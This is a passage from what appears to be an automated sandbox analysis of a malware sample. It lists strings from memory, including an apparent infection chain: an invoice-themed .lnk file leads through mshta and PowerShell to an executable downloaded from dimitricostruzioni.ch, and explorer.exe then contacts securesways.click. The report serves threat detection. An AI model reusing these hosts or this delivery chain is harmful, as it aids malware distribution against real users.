                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dimitricostruzioni.ch
                      Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://epscd.catcert.net/crl/ec-acc.crl0.
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://epscd2.catcert.net/crl/ec-acc.crl0
                      Source: qmgr.db.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.catcert.cat0
                      Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                      Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24D6F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.catcert.cat/descarrega/acc.crt0#
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B8A4000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.drString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B8A4000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.drString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-/W3C/DTD
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008AF6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F28000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                      Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: 2D85F72862B55C4EADD9E66E06947F3D0.10.drString found in binary or memory: http://x1.i.lencr.org/
                      Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24D6F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                      Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                      Source: powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.c
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch
                      Source: mshta.exe, 00000005.00000003.2665496381.000001BB90B79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/d
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/di
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dim
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimi
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimit
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitr
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/T
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TC
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCU
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUI
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUIN
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINO
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINOV
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINOVJ
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINOVJ.
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINOVJ.e
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINOVJ.ex
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/dimitri/TCUINOVJ.exe
                      Source: mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672431998.000001C3937F9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2669434915.000001C3937F5000.00000004.00000020.00020000.00000000.sdmp, Rechnung736258.pdf.lnkString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie
                      Source: powershell.exeString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie$global:?
                      Source: mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie(
                      Source: mshta.exe, 00000005.00000003.2666686122.000001C3937ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667263029.000001C3937F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682370166.000001C3937F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667620476.000001C3937F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2669434915.000001C3937F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie...
                      Source: mshta.exe, 00000005.00000002.2679004868.000001C39374B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie...K
                      Source: mshta.exe, 00000005.00000003.2666686122.000001C3937ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667263029.000001C3937F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682370166.000001C3937F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667620476.000001C3937F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2669434915.000001C3937F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie...w
                      Source: mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie1
                      Source: WMIC.exe, 00000000.00000002.2025601341.00000155F9FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie=C:
                      Source: mshta.exe, 00000005.00000003.2665693164.000001BB90BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2676895482.000001BB90AE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677379657.000001BB90BD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665496381.000001BB90BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplieC:
                      Source: mshta.exe, 00000005.00000002.2678187215.000001C3929E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplieH
                      Source: mshta.exe, 00000005.00000002.2683202614.000001C3978A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplieLMEM
                      Source: mshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplieV
                      Source: mshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplieaj
                      Source: mshta.exe, 00000005.00000003.2673692306.000001C399325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcompliehttps://dimitricostruzioni.ch/documentcomplie
                      Source: mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcompliep
                      Source: mshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplies
                      Source: mshta.exe, 00000005.00000002.2677433600.000001BB90E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcompliesLO
                      Source: WMIC.exe, 00000000.00000003.2024092555.00000155FA065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplieth=
                      Source: mshta.exe, 00000005.00000002.2683407387.000001C397F10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/documentcomplie~l
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/KlarnaInvoice42611.pdf
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: svchost.exe, 00000006.00000003.2080132292.00000208617C3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                      Source: svchost.exe, 00000006.00000003.2080132292.0000020861750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: powershell.exe, 00000007.00000002.2250832181.000002E24D91A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: explorer.exe, 00000015.00000003.2689095480.0000000005F1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: mshta.exe, 00000005.00000002.2676895482.000001BB90B07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comMicrosoft
                      Source: powershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                      Source: explorer.exe, 00000015.00000003.2767821799.0000000003120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/
                      Source: explorer.exe, 00000015.00000003.2817683193.000000000311D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2780823984.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/1
                      Source: explorer.exe, 00000015.00000003.2840242712.0000000003121000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841475060.0000000003121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securesways.click/C
                      Source: explorer.exe, explorer.exe, 00000015.00000003.2780432766.0000000005EF3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2817804063.0000000003130000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2663040829.0000000005F06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2738829020.0000000003110000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2839435655.0000000003110000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2662553402.0000000005F06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2686479139.0000000005F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2767792201.0000000005F0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2839174291.000000000311D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2839435655.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2767254159.0000000005F0A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2686677332.0000000003130000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2738398343.000000000310D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2817718397.0000000005F0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 